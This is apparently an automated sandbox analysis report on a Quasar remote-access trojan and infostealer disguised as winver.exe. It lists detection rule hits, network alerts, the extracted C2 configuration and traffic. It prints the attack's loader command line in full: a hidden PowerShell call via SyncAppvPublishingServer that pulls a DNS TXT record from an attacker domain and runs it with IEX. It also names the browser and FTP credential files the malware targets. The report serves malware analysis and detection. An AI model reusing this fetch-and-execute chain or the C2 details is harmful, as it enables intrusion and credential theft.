11.2.winver.exe.1f9f2ed1997.2.raw.unpack	MALWARE_Win_QuasarStealer	Detects Quasar infostealer	ditekshen	0x17934a:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null 0x2a955c:$s3: Process already elevated. 0x28c801:$s4: get_PotentiallyVulnerablePasswords 0x2768bd:$s5: GetKeyloggerLogsDirectory 0x29c58a:$s5: GetKeyloggerLogsDirectory 0x28c824:$s6: set_PotentiallyVulnerablePasswords
11.2.winver.exe.1f9f2ed1997.2.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
11.2.winver.exe.1f9f2ed1997.2.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x28ad02:$x1: Quasar.Common.Messages 0x29b02b:$x1: Quasar.Common.Messages 0x2a7672:$x4: Uninstalling... good bye :-( 0x2a8e67:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
11.2.winver.exe.1f9f2ed1997.2.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2a6c24:$f1: FileZilla\recentservers.xml 0x2a6c64:$f2: FileZilla\sitemanager.xml 0x2a6ca6:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x2a6ef2:$b1: Chrome\User Data\ 0x2a6f48:$b1: Chrome\User Data\ 0x2a7220:$b2: Mozilla\Firefox\Profiles 0x2a731c:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2f8a65:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2a7474:$b4: Opera Software\Opera Stable\Login Data 0x2a752e:$b5: YandexBrowser\User Data\ 0x2a759c:$b5: YandexBrowser\User Data\ 0x2a7270:$s4: logins.json 0x2a6fa6:$a1: username_value 0x2a6fc4:$a2: password_value 0x2a72b0:$a3: encryptedUsername 0x30c154:$a3: encryptedUsername 0x2a72d4:$a4: encryptedPassword 0x30c172:$a4: encryptedPassword 0x30c0f0:$a5: httpRealm
11.2.winver.exe.1f9f2ed1997.2.unpack	MALWARE_Win_QuasarStealer	Detects Quasar infostealer	ditekshen	0x17754a:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null 0x2a775c:$s3: Process already elevated. 0x28aa01:$s4: get_PotentiallyVulnerablePasswords 0x274abd:$s5: GetKeyloggerLogsDirectory 0x29a78a:$s5: GetKeyloggerLogsDirectory 0x28aa24:$s6: set_PotentiallyVulnerablePasswords
Click to see the 23 entries

Other

Source	Rule	Description	Author	Strings
amsi64_7352.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\Tasks\winver.exe" cd394167-be4e-4779-8fcd-6d3374e9bfcc, CommandLine: "C:\Windows\Tasks\winver.exe" cd394167-be4e-4779-8fcd-6d3374e9bfcc, CommandLine|base64offset|contains: q^{;}~m, Image: C:\Windows\Tasks\winver.exe, NewProcessName: C:\Windows\Tasks\winver.exe, OriginalFileName: C:\Windows\Tasks\winver.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n;(Resolve-DnsName -Name ebtxghggfv.cdn-streaming.com -Type TXT).Strings | IEX}, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7352, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Tasks\winver.exe" cd394167-be4e-4779-8fcd-6d3374e9bfcc, ProcessId: 7284, ProcessName: winver.exe

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Windows\Tasks\winver.exe" cd394167-be4e-4779-8fcd-6d3374e9bfcc, CommandLine: "C:\Windows\Tasks\winver.exe" cd394167-be4e-4779-8fcd-6d3374e9bfcc, CommandLine|base64offset|contains: q^{;}~m, Image: C:\Windows\Tasks\winver.exe, NewProcessName: C:\Windows\Tasks\winver.exe, OriginalFileName: C:\Windows\Tasks\winver.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n;(Resolve-DnsName -Name ebtxghggfv.cdn-streaming.com -Type TXT).Strings | IEX}, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7352, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Tasks\winver.exe" cd394167-be4e-4779-8fcd-6d3374e9bfcc, ProcessId: 7284, ProcessName: winver.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Windows\Tasks\winver.exe" cd394167-be4e-4779-8fcd-6d3374e9bfcc, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7352, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OutlookUpdater_1206996950

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7352, TargetFilename: C:\Windows\Tasks\winver.exe

Sigma detected: Suspicious Process Start Locations

Source: Process started

Author: juju4, Jonhnathan Ribeiro, oscd.community: Data: Command: "C:\Windows\Tasks\winver.exe" cd394167-be4e-4779-8fcd-6d3374e9bfcc, CommandLine: "C:\Windows\Tasks\winver.exe" cd394167-be4e-4779-8fcd-6d3374e9bfcc, CommandLine|base64offset|contains: q^{;}~m, Image: C:\Windows\Tasks\winver.exe, NewProcessName: C:\Windows\Tasks\winver.exe, OriginalFileName: C:\Windows\Tasks\winver.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n;(Resolve-DnsName -Name ebtxghggfv.cdn-streaming.com -Type TXT).Strings | IEX}, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7352, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Tasks\winver.exe" cd394167-be4e-4779-8fcd-6d3374e9bfcc, ProcessId: 7284, ProcessName: winver.exe

Sigma detected: SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\wscript.exe" C:\Windows\System32\SyncAppvPublishingServer.vbs "n;(Resolve-DnsName -Name ebtxghggfv.cdn-streaming.com -Type TXT).Strings | IEX", CommandLine: "C:\Windows\System32\wscript.exe" C:\Windows\System32\SyncAppvPublishingServer.vbs "n;(Resolve-DnsName -Name ebtxghggfv.cdn-streaming.com -Type TXT).Strings | IEX", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\wscript.exe" C:\Windows\System32\SyncAppvPublishingServer.vbs "n;(Resolve-DnsName -Name ebtxghggfv.cdn-streaming.com -Type TXT).Strings | IEX", ProcessId: 7304, ProcessName: wscript.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\wscript.exe" C:\Windows\System32\SyncAppvPublishingServer.vbs "n;(Resolve-DnsName -Name ebtxghggfv.cdn-streaming.com -Type TXT).Strings | IEX", CommandLine: "C:\Windows\System32\wscript.exe" C:\Windows\System32\SyncAppvPublishingServer.vbs "n;(Resolve-DnsName -Name ebtxghggfv.cdn-streaming.com -Type TXT).Strings | IEX", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\wscript.exe" C:\Windows\System32\SyncAppvPublishingServer.vbs "n;(Resolve-DnsName -Name ebtxghggfv.cdn-streaming.com -Type TXT).Strings | IEX", ProcessId: 7304, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n;(Resolve-DnsName -Name ebtxghggfv.cdn-streaming.com -Type TXT).Strings | IEX}, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n;(Resolve-DnsName -Name ebtxghggfv.cdn-streaming.com -Type TXT).Strings | IEX}, CommandLine|base64offset|contains: '"{^-, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\wscript.exe" C:\Windows\System32\SyncAppvPublishingServer.vbs "n;(Resolve-DnsName -Name ebtxghggfv.cdn-streaming.com -Type TXT).Strings | IEX", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7304, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n;(Resolve-DnsName -Name ebtxghggfv.cdn-streaming.com -Type TXT).Strings | IEX}, ProcessId: 7352, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7948, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE Generic AsyncRAT Style SSL Cert

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T23:07:28.872999+0100	2035595	1	Domain Observed Used for C2 Detected	37.1.223.28	80	192.168.2.4	49823	TCP

ET MALWARE Observed Malicious SSL Cert (Quasar CnC)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T23:07:28.872999+0100	2027619	1	Domain Observed Used for C2 Detected	37.1.223.28	80	192.168.2.4	49823	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T23:06:08.403607+0100	2803305	3	Unknown Traffic	192.168.2.4	49731	37.1.223.28	443	TCP
2024-12-18T23:06:10.454731+0100	2803305	3	Unknown Traffic	192.168.2.4	49732	37.1.223.28	443	TCP
2024-12-18T23:06:17.821977+0100	2803305	3	Unknown Traffic	192.168.2.4	49735	37.1.223.28	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 11.2.winver.exe.1f9f3be0000.3.raw.unpack

Malware Configuration Extractor: Quasar {"Version": "1.4.1", "Host:Port": "cdn-streaming.com:80;", "SubDirectory": "SubDir", "InstallName": "Client.exe", "MutexName": "65768f90-1bce-4e20-baef-7e1bf22954c2", "StartupKey": "Quasar Client Startup", "LogDirectoryName": "Logs", "ServerSignature": "rhsyWXoCiIJqrBxv7EYv2tSZgcX2hjKLoCdYiML+ca1mXqlmVtNJyuT9Rk0P50Ok12L1D8piyRg2Co/HzYi3ewbIpj2xoYZH2zGIfcw9cVBbddymnDYZQdq71IY0WLI7R7niFAD8Q3cPut+n8JlfElcKf7vEhZc9KHoxNJRRO3w8AwxygZDvLijRkfOzhTvjEmOYYrPylIdVA9oUZtG1dvy9QMn++NILtdKoHpLK2SLuV+KtoWZPA24BoAfIyGdccDGlTS/0a/XNjsSAJpV5UG33hm9J9BOWnsfAP+RCjWYu15zLnpH4d9v3W66dpL4XKVxJK9AIBDv5jVcyzPkQ57GAFqASRXHSTsETrv2dhXqcVeId2NbqAzYr1IwH68kn+liigPdyXk2N6hAGvascuA0emdi6XRYiz1leWogvagJXtxT4dcLl/UIYIrwnDBMREICA9IWOIe8dzDGAIoyMQxgqfsZRCc3qL3HlAv4bkiWPk4lCyoWPTA31GPbGj3SpJvX6LkIk5LD3vTusnvU705K3V3kbiD1x7tDFADG3CU3LE0tkTQMsNG9uu6sVkrQGud/iVYFloYGhM7oOFnWm6gdSD5YN6tk+902mKUkYp5W32+f7V7jcFPnmdwICnS1ll/yG7NMta6eBTQtAnPHI2DUEUPbLME/o9lgBPmPIF5I=", "ServerCertificate": "MIIE9DCCAtygAwIBAgIQAKiKPBvPlgeINAqKFVa9GTANBgkqhkiG9w0BAQ0FADAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMCAXDTI0MTIxMzIwMTUzNFoYDzk5OTkxMjMxMjM1OTU5WjAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAxiPDRYkAuLoLcoDIrzpsnMiPl58nKlO/Ht4U5uNtlOv6oSxcv1stTQi2PaMY4Nye3fiTfV/EeOomF4jU/C5X9N5a2YJQMZ13czLthq5NzgsVyPpP3LY54NzXB0f+qiTUHQkLucBWqF8895QRkoWeXx8ZzLA/iiN2ZQOkpT2SbFNWUq4jTwXUbvY65JnywiusY8wnH53ybJV1OhiWdRJ7C77xuI4wBynd3grcK2nHYgY5ALmPbRPgG4YZzvhknyWtlTZ/gEXVfDJF9laR0cESl1h3Q74J8uEJD8qEHHAJbAlaMDA1xndM4TfzdYgZGJDkZhTywhvjbdUcHb/Wjwq369avPwQZNcbgjqsCkWjibdE30CSvwzRVFMFL1+o9FnthTq0XLfllwrfv3biEPtvUokRz+SWxL/cm01yHReC4NcH1cDK83xOlpmHY3y+lSRp4qkImDtNN9jsSHJzSqOKz1N/ttZwPpaii8LesnktHcwWKCU9vrffvamvyCGzcQrLeX47bqOtxWo/ZALRxxMW3x1PDEn+2GqlMtcxEyh2B6GHrNG7jF5hGrOHUSHg+iLI8p9hvoq01VpfCn+Dn62g1BlCglvLibKJrKtFWm4dHnWrVHMLN3q756SGEhmpXsVD0YZ9oPX76yHRNFZbMI19it+MfVRvF6L4UvTn5bS7vjxcCAwEAAaMyMDAwHQYDVR0OBBYEFBurVOJdfxFNTMSxkxmn1crYwAPAMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADggIBAJX++sY5hBqHxVfcyMsAt839DuI9FxixiT5t8ba5sSvt/4wrMtiV2yEuywR1mkxcS4E7HnEPe9BfByUv97f2m05UhCx+HS5edM6hn7TrZrI0Vs4KhXl/WQqYRP8s017gBQad0Ac+aO5yntzJsz37znrc0nX8N7t6R7kgg+dHAqfVSZoTlyeCOidbiU6UkBpR816BZ4w8VmFHgO6TpxHzirIXiXOsFp53dX7GZbQEvTrWO9kkQF2iVITGo1OAYU045n+75rX5I6H63FRpvhK1JgFOfSjdwoVAtM2zX6bekQ8XY0kK3mFwwjEhTQEROTRMPNi4PxS+3WJ6tmIKebiKhnA/5AUJlL/cdKcz+KuLP0aowTPmlfCgtkHiWWuFRY2975sQ96ezAFFa/z0Wl2Bca/LJzNL39gki45jOFizPTmBOZ1rTge9SqCwO8QegjmJa1w8nScgMiP0b1JxuVoi6bKPEBaMg1xEkcUpT3ho+L9un4qHQE3fKS9Pd1lhI6PFOOS6bpQOCy+MH1TLlIxuKsA+KtXwqj4/rf4F1JI69wnxfz5ZnE/wSHJlsnahZ/J8DAu5bnz0RLPSrIo9Iu1liijsVj2lTKRRSO7vFkppEylivc04aDZtHV0Fwf9WrJz6XLzzwZgVptfOE9LO2WzuuTNFrLKQH/ZNhMDTZ/v0kFHVn"}

Yara detected Quasar RAT

Source: Yara match	File source: 11.2.winver.exe.1f9f3be0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.winver.exe.1f9f3be0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.winver.exe.1f9900100e8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.winver.exe.1f9900100e8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.winver.exe.10957.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.winver.exe.1f9f2ed1997.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.winver.exe.1f9f2ed1997.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2940913887.0000000000280000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2941396332.0000000000320000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2941064855.00000000002B0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2941354870.0000000000310000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2942161728.000001F980001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2943385334.000001F990009000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2942161728.000001F9801D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2949364454.000001F9F38BA000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2950072925.000001F9F3BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2948303433.000001F9F2ED1000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: winver.exe PID: 7284, type: MEMORYSTR

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Source: unknown	HTTPS traffic detected: 37.1.223.28:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.181.61.49:443 -> 192.168.2.4:49829 version: TLS 1.2

Source: C:\Windows\Tasks\winver.exe

Code function: 11_2_00007FF63D80D658 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,

11_2_00007FF63D80D658

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2027619 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (Quasar CnC) : 37.1.223.28:80 -> 192.168.2.4:49823
Source: Network traffic	Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 37.1.223.28:80 -> 192.168.2.4:49823

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: cdn-streaming.com

Source: global traffic	HTTP traffic detected: GET /hP3TJdoqvDIYbA3JIxDstAFA HTTP/1.1Host: cdn-streaming.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /62rgx9T9MW.pdf HTTP/1.1Host: cdn-streaming.com
Source: global traffic	HTTP traffic detected: GET /avatar.jpg HTTP/1.1Host: cdn-streaming.com
Source: global traffic	HTTP traffic detected: GET /logo.png HTTP/1.1Host: cdn-streaming.com

Source: Joe Sandbox View

IP Address: 108.181.61.49 108.181.61.49

Source: Joe Sandbox View

ASN Name: SCALAXY-ASNL SCALAXY-ASNL

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: ipwho.is
Source: unknown	DNS query: name: ipwho.is

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49731 -> 37.1.223.28:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49732 -> 37.1.223.28:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49735 -> 37.1.223.28:443

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /hP3TJdoqvDIYbA3JIxDstAFA HTTP/1.1Host: cdn-streaming.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /62rgx9T9MW.pdf HTTP/1.1Host: cdn-streaming.com
Source: global traffic	HTTP traffic detected: GET /avatar.jpg HTTP/1.1Host: cdn-streaming.com
Source: global traffic	HTTP traffic detected: GET /logo.png HTTP/1.1Host: cdn-streaming.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: ebtxghggfv.cdn-streaming.com
Source: global traffic	DNS traffic detected: DNS query: cdn-streaming.com
Source: global traffic	DNS traffic detected: DNS query: x1.i.lencr.org
Source: global traffic	DNS traffic detected: DNS query: ipwho.is

Source: powershell.exe, 00000001.00000002.1898768989.000001AD59ADB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1898768989.000001AD59CA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1898768989.000001AD5A186000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cdn-streaming.com
Source: powershell.exe, 00000001.00000002.1898768989.000001AD59C8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1898768989.000001AD59CA1000.00000004.00000800.00020000.00000000.sdmp, winver.exe.1.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: powershell.exe, 00000001.00000002.1898768989.000001AD59C8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1898768989.000001AD59CA1000.00000004.00000800.00020000.00000000.sdmp, winver.exe.1.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: powershell.exe, 00000001.00000002.1898768989.000001AD59C8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1898768989.000001AD59CA1000.00000004.00000800.00020000.00000000.sdmp, winver.exe.1.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: winver.exe.1.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: powershell.exe, 00000001.00000002.1898768989.000001AD59C8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1898768989.000001AD59CA1000.00000004.00000800.00020000.00000000.sdmp, winver.exe.1.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: svchost.exe, 00000006.00000002.2943077828.00000167A7A00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: winver.exe, 0000000B.00000002.2944627944.000001F9F00A4000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.5.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: winver.exe, 0000000B.00000002.2944627944.000001F9F00A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/eng
Source: svchost.exe, 00000006.00000003.1823538213.00000167A7C18000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.6.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: edb.log.6.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: edb.log.6.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000006.00000003.1823538213.00000167A7C18000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000006.00000003.1823538213.00000167A7C18000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000006.00000003.1823538213.00000167A7C4D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.6.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: winver.exe, 0000000B.00000002.2942161728.000001F980185000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ipwho.is
Source: powershell.exe, 00000001.00000002.1898768989.000001AD59C8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1898768989.000001AD59CA1000.00000004.00000800.00020000.00000000.sdmp, winver.exe.1.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: powershell.exe, 00000001.00000002.1898768989.000001AD59C8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1898768989.000001AD59CA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/gscod
Source: winver.exe.1.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: powershell.exe, 00000001.00000002.1898768989.000001AD59C8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1898768989.000001AD59CA1000.00000004.00000800.00020000.00000000.sdmp, winver.exe.1.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: powershell.exe, 00000001.00000002.1898768989.000001AD59C8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1898768989.000001AD59CA1000.00000004.00000800.00020000.00000000.sdmp, winver.exe.1.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: winver.exe, 0000000B.00000002.2942161728.000001F9801D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: powershell.exe, 00000001.00000002.1898768989.000001AD58D87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
